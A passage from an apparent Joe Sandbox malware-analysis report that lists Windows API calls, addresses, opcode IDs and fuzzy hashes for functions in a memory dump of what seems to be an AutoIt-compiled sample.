                                                                                                                            • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                            • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                                                            • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                            • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1358664141-0
                                                                                                                            • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                            • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                                                            • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                            • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2880819207-0
                                                                                                                            • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                            • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                                                            • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                            • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                                                            APIs
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                                                            • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 357397906-0
                                                                                                                            • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                            • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                                                            • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                            • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                            • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                            • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                                                                            APIs
                                                                                                                            • __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                            • __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                            • __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                            • __wcsicoll.LIBCMT ref: 00436AB0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1187119602-0
                                                                                                                            • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                            • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                                                                            • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                            • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1597257046-0
                                                                                                                            • Opcode ID: 9d58570e0328b0cf2166bcf5230b4d4f76ced30d7f4183b4fc8936074b496a0e
                                                                                                                            • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                                                                            • Opcode Fuzzy Hash: 9d58570e0328b0cf2166bcf5230b4d4f76ced30d7f4183b4fc8936074b496a0e
                                                                                                                            • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                                                                            APIs
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteDestroyObject$IconWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3349847261-0
                                                                                                                            • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                            • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                                                                            • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                            • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
• Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
• Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
• Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
• Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
APIs
  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
• MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
• LineTo.GDI32(?,00000000,00000002), ref: 004472A0
• EndPath.GDI32(?), ref: 004472B0
• StrokePath.GDI32(?), ref: 004472BE
Similarity
• API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
• String ID:
• API String ID: 2783949968-0
• Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
• Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
• Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
• Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
APIs
• __getptd.LIBCMT ref: 00417D1A
  • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
  • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
• __getptd.LIBCMT ref: 00417D31
• __amsg_exit.LIBCMT ref: 00417D3F
• __lock.LIBCMT ref: 00417D4F
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID:
• API String ID: 3521780317-0
• Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
• Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
• Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
• Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
APIs
• GetDesktopWindow.USER32 ref: 00471144
• GetDC.USER32(00000000), ref: 0047114D
• GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
• ReleaseDC.USER32(00000000,?), ref: 0047117B
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
• Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
• Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
• Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
APIs
• GetDesktopWindow.USER32 ref: 00471102
• GetDC.USER32(00000000), ref: 0047110B
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
• ReleaseDC.USER32(00000000,?), ref: 00471139
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
• Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
• Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
• Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
APIs
• SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
• GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
• GetCurrentThreadId.KERNEL32 ref: 004389DA
• AttachThreadInput.USER32(00000000), ref: 004389E1
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
• Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
• Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
• Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
• CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
• CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
  • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
  • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
• Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
• Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
• Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
APIs
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
• __getptd_noexit.LIBCMT ref: 00414080
• __freeptd.LIBCMT ref: 0041408A
• ExitThread.KERNEL32 ref: 00414093
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3182216644-0
                                                                                                                            • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                            • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                                                                            • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                                                            • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
APIs
• OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: CopyVariant$ContainedObject$ErrorLast_malloc
• String ID: AutoIt3GUI$Container
• API String ID: 3380330463-3941886329
• Opcode ID: a9f97b6700f357a03770d98d5d55076cc5e2169ba658a06b5870c4020d3518f4
• Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
• Opcode Fuzzy Hash: a9f97b6700f357a03770d98d5d55076cc5e2169ba658a06b5870c4020d3518f4
• Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
APIs
• _wcslen.LIBCMT ref: 00409A61
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• CharUpperBuffW.USER32(?,?), ref: 00409AF5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: 0vH
• API String ID: 1143807570-3662162768
• Opcode ID: 4a0c3e6e29e1d1bc7a3692a4260546dbd268f52409d69d207a9efd33b4fdebc2
• Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
• Opcode Fuzzy Hash: 4a0c3e6e29e1d1bc7a3692a4260546dbd268f52409d69d207a9efd33b4fdebc2
• Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID:
• String ID: HH$HH
• API String ID: 0-1787419579
• Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
• Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
• Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
• Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 661fa1af2a8bfdde850db679a74a64cd87ae05e24632a93af23ae5e89122f41c
• Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
• Opcode Fuzzy Hash: 661fa1af2a8bfdde850db679a74a64cd87ae05e24632a93af23ae5e89122f41c
• Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
• Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
